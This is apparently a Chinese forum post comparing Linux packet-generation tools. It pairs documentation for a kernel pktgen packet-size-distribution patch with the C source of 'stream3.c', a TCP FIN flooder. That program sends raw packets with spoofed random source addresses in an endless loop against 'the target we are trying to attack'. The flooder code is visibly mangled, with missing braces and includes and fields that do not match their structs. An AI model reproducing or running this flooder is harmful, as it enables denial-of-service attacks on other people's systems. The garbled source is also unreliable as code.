查看: 1339 | 回复: 0
Linux网络发包工具PK

   The packet size distribution enhancement of the
Linux Kernel Packet Generator:
Table of Contents:
I.     How it works
II.    How to use the new enhancements
III.    How to install this module
IV.     What i have change in the code
First of all I want to mention that this patch was only tested on a x86
PC with a v2.6.8 Linux Kernel. But please report problems to me:
fabian_at_net.in.tum.de (substitute "_at_" with "@")
I. How it works:
When a new packet shall be generated, a new packet size has to be
determined. Therefore we randomly choose an entry of the (so called)
outliers array. This array contains packet size values of those packet
sizes which appear very often in the distribution which shall be
represented. If we read a -1 in this array, none of these packet sizes
is choosen, therefore we need to choose randomly again. But this time we
use another array---the so called histos array. In this array the entrys
are the lowest packet size of the bin which it is representing. For this
reason we need to add random jitter of maximal the width of such a bin
(called hist_width below) to this obtained packet size.
II. How to use the new enhancements:
1. Read the original pktgen.txt
2. The following three new commands for the /proc interface were added:
    pgset "dist 1000 20 1500 33 75"
    This is used to set up the Linux Kernel Packet Generator for excepting
    the distributions entered by the "outl" and "hist" commands. The syntax
    is: dist     
    With  the size of the array used for generating the
    different packet sizes is set. This is directly influencing how high
    the resolution of the different entrys is.
    The  sets the width of a bin.
    The  sets the maximum packet size.
    The  and  define how many lines of "oult" and
    "hist" have to follow until the input distribution is complete.
    pgset "outl 40 179"
    Syntax: outl  
    This instructs the Generator to fill  of the outliers array
    with the packet size
    pgset "hist 40 91"
    Syntax: hist  
    This instructs the Generator to fill  of the histos array
    with the packet size , to which jitter will be added.
3. To activate the distribution you have to switch the PKTSIZE_REAL flag
    pgset "flag PKTSIZE_REAL". This will only succeed if the distribution
    is complete and correct, indicated with the DIST_READY flag.
III. How to install this module:
1. Download the source code:
2. unpack the tar archive:
    tar -xvzf pktgen-lkpg-dist-0.1.tar.gz
3. Copy the new pktgen.c over the old:
    cp pktgen-lkpg-dist-0.1/pktgen.c /usr/src/linux/net/core/pktgen.c
4. Compile the new pktgen.c:
    cd /usr/src/linux/net/core
    make -C /usr/src/linux SUBDIRS=$PWD modules
5. Install the new module:
    cd /usr/src/linux
    make modules_install
6. use it!
stream3.c - TCP FIN packet flooder
patched from stream.c by 3APA3A, 2000
#ifndef __USE_BSD
#define __USE_BSD
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#ifdef LINUX
#define FIX(x)  htons(x)
#define FIX(x)  (x)
struct ip_hdr {
    u_int       ip_hl:4,                /* header length in 32 bit words */
                ip_v:4;                 /* ip version */
    u_char      ip_tos;                 /* type of service */
    u_short     ip_len;                 /* total packet length */
    u_short     ip_id;                  /* identification */
    u_short     ip_off;                 /* fragment offset */
    u_char      ip_ttl;                 /* time to live */
    u_char      ip_p;                   /* protocol */
    u_short     ip_sum;                 /* ip checksum */
    u_long      saddr, daddr;           /* source and dest address */
struct tcp_hdr {
    u_short     th_sport;               /* source port */
    u_short     th_dport;               /* destination port */
    u_long      th_seq;                 /* sequence number */
    u_long      th_ack;                 /* acknowledgement number */
    u_int       th_x2:4,                /* unused */
                th_off:4;               /* data offset */
    u_char      th_flags;               /* flags field */
    u_short     th_win;                 /* window size */
    u_short     th_sum;                 /* tcp checksum */
    u_short     th_urp;                 /* urgent pointer */
struct tcpopt_hdr {
    u_char  type;                       /* type */
    u_char  len;                                /* length */
    u_short value;                      /* value */
struct pseudo_hdr {                     /* See RFC 793 Pseudo Header */
    u_long saddr, daddr;                        /* source and dest address */
    u_char mbz, ptcl;                   /* zero and protocol */
    u_short tcpl;                       /* tcp length */
struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
/* struct tcpopt_hdr opt; */
struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;
void usage(char *progname)
    fprintf(stderr, "Usage: %s    \n",
    fprintf(stderr, "    dstaddr  - the target we are trying to attack.\n");
    fprintf(stderr, "    dstport  - the port of the target, 0 = random.\n");
    fprintf(stderr, "    pktsize  - the extra size to use.  0 = normal syn.\n");
/* This is a reference internet checksum implimentation, not very fast */
inline u_short in_cksum(u_short *addr, int len)
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
     /* Our algorithm is simple, using a 32 bit accumulator (sum), we add
      * sequential 16 bit words to it, and at the end, fold back all the
      * carry bits from the top 16 bits into the lower 16 bits. */
     while (nleft > 1)  {
         sum += *w++;
         nleft -= 2;
     /* mop up an odd byte, if necessary */
     if (nleft == 1) {
         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     /* add back carry outs from top 16 bits to low 16 bits */
     sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
     sum += (sum >> 16);                /* add carry */
     answer = ~sum;                     /* truncate to 16 bits */
u_long lookup(char *hostname)
    struct hostent *hp;
    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s.\n", hostname);
    return *(u_long *)hp->h_addr;
void flooder(void)
    struct timespec ts;
    int i;
    memset(&packet, 0, sizeof(packet));
    ts.tv_sec                   = 0;
    ts.tv_nsec                  = 10;
    packet.ip.ip_hl             = 5;
    packet.ip.ip_v              = 4;
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = 0x08;
    packet.ip.ip_id             = rand();
    packet.ip.ip_len            = FIX(sizeof(packet));
    packet.ip.ip_off            = 0; /* IP_DF? */
    packet.ip.ip_ttl            = 255;
    packet.ip.ip_dst.s_addr     = dstaddr;
    packet.ip.ip_src.s_addr     = random();
    packet.ip.ip_sum             = 0;
    packet.tcp.th_sum           = 0;
    packet.tcp.th_win           = htons(16384);
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 5; /* 5 */
    packet.tcp.th_urp           = 0;
    packet.tcp.th_ack         = rand();
    packet.tcp.th_flags     = TH_ACK|TH_FIN;
    packet.tcp.th_sport     = rand();
    packet.tcp.th_dport         = dstport?htons(dstport):rand();
    packet.opt.type             = 0x02;
    packet.opt.len              = 0x04;
    packet.opt.value            = htons(1460);
    s_in.sin_family             = AF_INET;
    s_in.sin_port               = packet.tcp.th_dport;
    s_in.sin_addr.s_addr    = dstaddr;
    cksum.pseudo.daddr          = dstaddr;
    cksum.pseudo.saddr        = packet.ip.ip_src.s_addr;
    cksum.pseudo.mbz            = 0;
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = htons(sizeof(struct tcphdr));
    cksum.tcp                   = packet.tcp;
    packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);
    packet.tcp.th_sum           = in_cksum((void *)&cksum, sizeof(cksum));
    for(i=0;;++i) {
       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr
*)&s_in, sizeof(s_in)) < 0)
int main(int argc, char *argv[])
    int on = 1;
    printf("stream3.c v0.01 - TCP FIN Packet Flooder\n modified by 3APA3A@security.nnov.ru\n");
    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    setgid(getgid()); setuid(getuid());
    if (argc < 4)
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) <  0) {
    srand((time(NULL) ^ getpid()) + getppid());
    printf("\nResolving IPs..."); fflush(stdout);
    dstaddr     = lookup(argv[1]);
    dstport     = atoi(argv[2]);
    pktsize     = atoi(argv[3]);
    printf("Sending..."); fflush(stdout);
    return 0;


